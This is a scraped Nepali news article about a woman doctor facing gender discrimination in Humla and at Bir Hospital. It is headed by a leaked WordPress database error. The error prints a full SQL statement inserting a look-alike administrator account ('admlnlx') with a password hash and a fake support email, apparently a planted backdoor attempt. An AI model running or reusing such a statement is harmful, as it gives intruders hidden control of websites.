WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8Tb9zQYkcjkkPn772Si2nbp.De2FK0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 06:27:28', '', 'admlnlx', 'admlnlx')
हुम्ला जानु अघि र एमबिबिएसको पढाईपछि डा. स्मृतीले वीर अस्पतालमा डेढ वर्ष करारका रुपमा काम गरेकी थिइन् । वीर अस्पतालमा काम गर्ने क्रममा उनलाई महिला भएकै कारण धेरैले विभेद समेत गरेका थिए । राजधानीकै अस्पतालमा विभेदमा परेकी उनी दुर्गम जिल्ला त्यसमा पनि अशिक्षितको जमात बढी भएको स्थानमा पुग्दा त्यसको सिकारमा नपर्ने कुरै भएन ।
हुम्लाका मानिसहरुले सुरुमा उनलाई डाक्टर होइन नर्स हो भन्ने सोचेका रहेछन् । दुर्गम क्षेत्रबाट आएका मानिसहरुलाई त महिला डाक्टर हुन्छन् भन्ने ज्ञान समेत रहेनछ । स्मृती डाक्टर हुन् भन्ने थाहा पाएपछि धेरैले आश्चार्य मान्दै भने, ‘अहो महिला पनि डाक्टर हुँदा रहेछन् ।’ डाक्टर नै नजाने र गएका पनि बस्न नरुचाउने स्थानमा पुगेकी स्मृतीले हुम्लाबासीलाई उपचार सेवा सँगै महिला पढाउनुपर्छ भन्ने सन्देश समेत दिएकी छिन् ।
भन्छिन्, ‘उपचारमा आएका धेरैले म डाक्टर हो भन्दा आश्चार्य मान्छन् । उनीहरुलाई म छोरोछोरीलाई पढाउनु पर्छ र डाक्टर बनाउनुपर्छ भन्ने गरेको छु ।’